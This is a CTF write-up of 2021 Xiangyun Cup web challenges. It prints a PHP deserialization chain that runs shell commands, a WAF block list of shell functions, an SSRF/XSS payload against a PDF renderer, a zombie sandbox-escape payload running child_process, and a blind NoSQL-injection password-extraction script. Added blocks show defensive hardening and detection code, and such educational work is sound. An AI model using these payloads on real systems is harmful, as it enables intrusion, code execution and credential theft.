2021 Xiangyun Cup (祥云杯): Selected Web Challenges

ezyii

Key points:

  • Yii deserialization chain

https://github.com/JinYiTong/poc

<?php
namespace Codeception\Extension{
    use Faker\DefaultGenerator;
    use GuzzleHttp\Psr7\AppendStream;
    class  RunProcess{
        protected $output;
        private $processes = [];
        public function __construct(){
            $this->processes[]=new DefaultGenerator(new AppendStream());
            $this->output=new DefaultGenerator('jiang');
        }
    }
    echo base64_encode(serialize(new RunProcess()));
}

namespace Faker{
    class DefaultGenerator
    {
        protected $default;

        public function __construct($default = null)
        {
            $this->default = $default;
        }
    }
}
namespace GuzzleHttp\Psr7{
    use Faker\DefaultGenerator;
    final class AppendStream{
        private $streams = [];
        private $seekable = true;
        public function __construct(){
            $this->streams[]=new CachingStream();
        }
    }
    final class CachingStream{
        private $remoteStream;
        public function __construct(){
            $this->remoteStream=new DefaultGenerator(false);
            $this->stream=new  PumpStream();
        }
    }
    final class PumpStream{
        private $source;
        private $size=-10;
        private $buffer;
        public function __construct(){
            $this->buffer=new DefaultGenerator('j');
            include("closure/autoload.php");
            $a = function(){system('cat /flag*');phpinfo();   };
            $a = \Opis\Closure\serialize($a);
            $b = unserialize($a);
            $this->source=$b;
        }
    }
}

安全检测 (Security Check)

Key points:

  • SSRF
  • session

http://127.0.0.1/admin has a directory listing

# include123.php

<?php
$u=$_GET['u'];

$pattern = "\/\*|\*|\.\.\/|\.\/|load_file|outfile|dumpfile|sub|hex|where";
$pattern .= "|file_put_content|file_get_content|fwrite|curl|system|eval|assert";
$pattern .="|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore";
$pattern .="|`|openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|assert|pcntl_exec|http|.php|.ph|.log|\@|:\/\/|flag|access|error|stdout|stderr";
$pattern .="|file|dict|gopher";
// tired, tired, tea break first

$vpattern = explode("|",$pattern);

foreach($vpattern as $value){    
    if (preg_match( "/$value/i", $u )){
        echo "检测到恶意字符";
        exit(0);
    }
}

include($u);

show_source(__FILE__);
?>

The session file records the URL that was checked, so just write a shell into it and include the session file; all that is needed is to get past the WAF. The source is disclosed by show_source.

Secrets_Of_Admin

Key points:

  • SSRF
  • array bypass

First look at the admin route: content has no type check, so it can be bypassed directly with an array, and the content is saved as a PDF.

From the html-to-pdf vulnerability below, we guess that constructing an XHR request lets us fetch arbitrary files.

Next look at the /api/files route: it checks remoteAddress, then stores username, filename and checksum in the database.

Finally the /api/files/:id route fetches a file by id; this is where the malicious file can be read.

Because the written content is rendered into HTML, JS code can be injected with a script tag.

content[]=%3Cscript%3Evar%20xhttp%20%3D%20new%20XMLHttpRequest()%3Bxhttp.open(%22GET%22%2C%20%22http%3A%2F%2F127.0.0.1%3A8888%2Fapi%2Ffiles%3Fusername%3Dadmin%26filename%3D.%2Fflag%26checksum%3D12345%22%2C%20true)%3Bxhttp.send()%3B%3C%2Fscript%3E
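The root causes here are a loose type check on content, user text being interpolated into the PDF template as markup, and a renderer that is free to talk to 127.0.0.1. The block below is an added example of how the route would be hardened; it is not the challenge's code. It assumes an Express-style handler (so `content[]=` arrives as an array) and a headless-browser PDF renderer that exposes request interception, which is where allowResourceRequest would be hooked.

```javascript
// Added example, not Secrets_Of_Admin's own code. Assumed setup: an Express-style
// handler reads req.body.content and feeds an HTML template to a headless-browser
// PDF renderer that can also fetch sub-resources.

// 1. Accept plain strings only. With the default query/body parser, `content[]=...`
//    arrives as an array, which is how a missing type check is sidestepped.
function normalizeContent(raw) {
  if (typeof raw !== 'string') {
    const kind = Array.isArray(raw) ? 'array' : typeof raw;
    throw new TypeError('content must be a string, got ' + kind);
  }
  if (raw.length > 10000) throw new RangeError('content too long');
  return raw;
}

// 2. Escape before interpolating into HTML so user text can never become markup.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

function buildPdfHtml(raw) {
  const text = escapeHtml(normalizeContent(raw));
  return `<!doctype html><html><body><pre>${text}</pre></body></html>`;
}

// 3. Even if markup slipped through, the renderer must not reach internal services.
//    Filter every sub-resource request: http(s) only, and no loopback/private hosts.
//    IPv6 hostnames from the WHATWG URL parser come back in brackets.
const PRIVATE_HOST = [
  /^localhost$/i,
  /^127\./, /^10\./, /^192\.168\./, /^169\.254\./, /^0\.0\.0\.0$/,
  /^172\.(1[6-9]|2[0-9]|3[01])\./,
  /^\[::1\]$/, /^\[f[cd]/i, /^\[fe80:/i,
];

function allowResourceRequest(url) {
  let u;
  try { u = new URL(url); } catch { return false; }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return false;
  return !PRIVATE_HOST.some((re) => re.test(u.hostname));
}
```

The hostname filter is a first line of defence only: a public name that resolves to an internal address is not caught by a string check, so the renderer should additionally run in a network namespace with no route to internal services, or the filter should be applied to the resolved address at connect time.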

crawler_z

Key points:

  • zombie vulnerability
  • variable override

The /profile route has a regex; if the input matches, it redirects to /user/verify and generates a token.

If the token is correct, the bucket is updated.

So we first satisfy the regex to obtain a token, but do not follow the redirect; then we update a malicious bucket, and finally access the route with the token.

Following this article, https://ha.cker.in/index.php/Article/13563, host the payload on a VPS:

<script>c='constructor';res=this[c][c]("c='constructor';require=this[c][c]('return process')().mainModule.require;var sync=require('child_process').spawnSync; var ls = sync('/readflag'); return ls.output.toString();")().toString();document.write(res)</script>

Finally, access the /user/bucket route to get a shell.

PackageManager2021

index.ts is just register, login and logout plus a token check; package.ts is the create/read/update/delete functionality for packages.

The token field has a JavaScript-type NoSQL injection: https://xz.aliyun.com/t/9908#toc-9

import requests

passwd = ""
for i in range(0,50):
    for j in range(32,127):
        url = "http://561085f1-6d16-45fc-be94-5e594f5ed527.node4.buuoj.cn:81/auth"
        cookies = {"session": "s%3AWGx2XRK-lLh6LEuOs5qoG2oy0W58cx9V.9%2BZ8Rx9N02Rzt7Dfne%2B8%2BCzYTcCD3bbSvkRHez9uuz8"}
        burp0_data = {"_csrf": "DLr9xGOK-dE79D7hQRBthJuRK7YUma4_VIBM", "token": "21232f297a57a5a743894a0e4a801fc3\"||(this.username==\"admin\"&&this.password[{}]==\"{}\")||\"".format(i,chr(j))}
        res=requests.post(url, cookies=cookies, data=burp0_data,allow_redirects=False)
        if res.status_code == 302:
            passwd += chr(j)
            print(passwd)

With the password recovered, log in as admin directly.
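For the defender's side of this one, the block below is an added example and not PackageManager2021's code. It assumes the /auth handler looks the token up through a MongoDB `$where` clause built by string concatenation (the "JavaScript-type" injection the writeup refers to) and that legitimate tokens are 32 hex characters, as the token in the script above is. It shows the vulnerable query shape beside the safe one, and a small log scanner that picks out the one-request-per-character pattern the extraction loop produces; the log format and sample lines are constructed for the example.

```javascript
// Added example, not PackageManager2021's own code.

// Vulnerable shape (for contrast only): the token text is spliced into JavaScript
// that the database evaluates, so quote characters change the expression's meaning.
function buildTokenQueryUnsafe(token) {
  return { $where: `this.token == "${token}"` };
}

// Hardened: reject anything that is not a 32-char hex token (assumed issued format),
// then use an equality filter. An object filter compares values; nothing in the
// token is ever interpreted as code.
const TOKEN_RE = /^[0-9a-f]{32}$/;

function buildTokenQuerySafe(token) {
  if (typeof token !== 'string' || !TOKEN_RE.test(token)) {
    return null;   // caller answers 400 and never reaches the lookup
  }
  return { token };
}

// Detection: a blind extraction loop sends one /auth request per candidate character,
// all under one session, each with a token that is not well-formed. Count malformed
// token attempts per session and flag bursts.
// Constructed log format: "<timestamp> <session-id> <status> token=<value>"
function scanAuthLog(lines, threshold = 20) {
  const perSession = new Map();
  for (const line of lines) {
    const m = /^\S+ (\S+) (\d{3}) token=(.*)$/.exec(line);
    if (!m) continue;
    const [, session, , token] = m;
    if (TOKEN_RE.test(token)) continue;
    perSession.set(session, (perSession.get(session) || 0) + 1);
  }
  return [...perSession.entries()]
    .filter(([, n]) => n >= threshold)
    .map(([session, n]) => ({ session, malformed: n }));
}

// Constructed sample: sess-A logs in normally, sess-B hammers /auth with malformed tokens.
const SAMPLE_LOG = [
  '2021-08-21T10:00:00Z sess-A 200 token=0123456789abcdef0123456789abcdef',
  ...Array.from({ length: 25 }, (_, i) =>
    `2021-08-21T10:00:${String(i).padStart(2, '0')}Z sess-B 302 token=aaaa"||bbbb${i}`),
];
```

The status code in the log is the same signal the script above keys on (302 on success, since the server redirects after a successful check), so a rule that also counts 302/non-302 alternation per session would sharpen the detection further.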
